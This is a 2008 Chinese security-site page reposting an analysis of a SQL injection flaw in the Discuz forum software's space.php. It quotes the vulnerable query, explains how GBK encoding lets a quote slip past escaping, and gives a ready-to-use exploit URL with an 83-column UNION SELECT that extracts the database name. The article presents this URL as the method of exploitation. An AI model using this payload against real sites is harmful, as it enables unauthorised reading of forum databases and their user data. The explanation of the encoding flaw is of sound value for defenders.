基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 安全动画 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 业内新闻 >> 漏洞公告 >> 文章正文
Discuz space.php注射漏洞分析
作者:admin    文章来源:转载    点击数:    更新时间:2008-8-17

$member = $db->fetch_first("SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower, u.readaccess,
  u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle,
  r.color AS rankcolor, r.stars AS rankstars $oltimeadd1
  FROM {$tablepre}members m
  LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid
  LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid
  LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher
  $oltimeadd2
  WHERE ".($uid ? "m.uid='$uid'" : "m.username='$username'")."ORDER BY r.postshigher DESC LIMIT 1");

discuz的空间功能 space.php

查询中包含username值查询,经过编码构造可产生注射漏洞 UTF-8 不存在此漏洞

最近常出现类似的编码注射漏洞,这是因为例如gbk这种编码下php服务器不能很好的过滤'号所以造成漏洞的发生,而使用UTF-8编码的程序不会出现这个问题,不会产生编码转换时的错误,引号得到了完好过滤,杜绝了编码注射漏洞的发生.

漏洞利用方法:

http://地址/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*

带上软件截图~重写了2边...操了delphi的TGIFIMAGE控件没装好~累死....

 

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章: 没有了
  • 最近更新
    推荐文章保护Web服务器从数据库
    推荐文章利用系统漏洞 破解Vis
    推荐文章站长改店长 月收入增长
    推荐文章新手建站推广完美教程
    推荐文章检查自己电脑是否成为
    推荐文章手把手教你如何让系统
    推荐文章我的电脑你别动!笔记
    推荐文章11种QQ技术 ,让你成为
    推荐文章六步让你和木马说永别
    推荐文章写个批处理记录追击黑
    热门文章
    普通文章你绝对不知道的QQ使用
    推荐文章检查自己电脑是否成为
    普通文章关于135端口问题和NTS
    普通文章点亮关闭QQ图标方法
    普通文章无法扫135的一般原因分
    普通文章QQ搞怪小技巧
    推荐文章11种QQ技术 ,让你成为
    普通文章打造永远不会被发现的
    普通文章没太阳又不是会员怎样
    普通文章教菜鸟破解路由器的帐
    相关文章
    21个实用技巧让你的Adse
    谈谈整站优化的基本要点
    保护Web服务器从数据库开
    aspx 操作mysql
    GHOST备份图解
    新的VBS下载方法
    主动防御还是主动免疫?
    网络安全公司技术精英开
    PECompact壳研究与解密脱
    帝国ECMS 0Day V5.0注射
    网吧频繁掉线(ARP)与快速
    CS服务器建立详尽攻略
    清除系统垃圾,保持系统
    简单实用 用IIS打造自己
    如何购买流量日赚几百
    日收上千元的网赚创意
    如何去掉腾讯QQ2008烦人
    捍卫自己的隐私隐藏加秘
    XP加速技巧大盘点 看看那
    eWebEditorNet 漏洞 upl
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号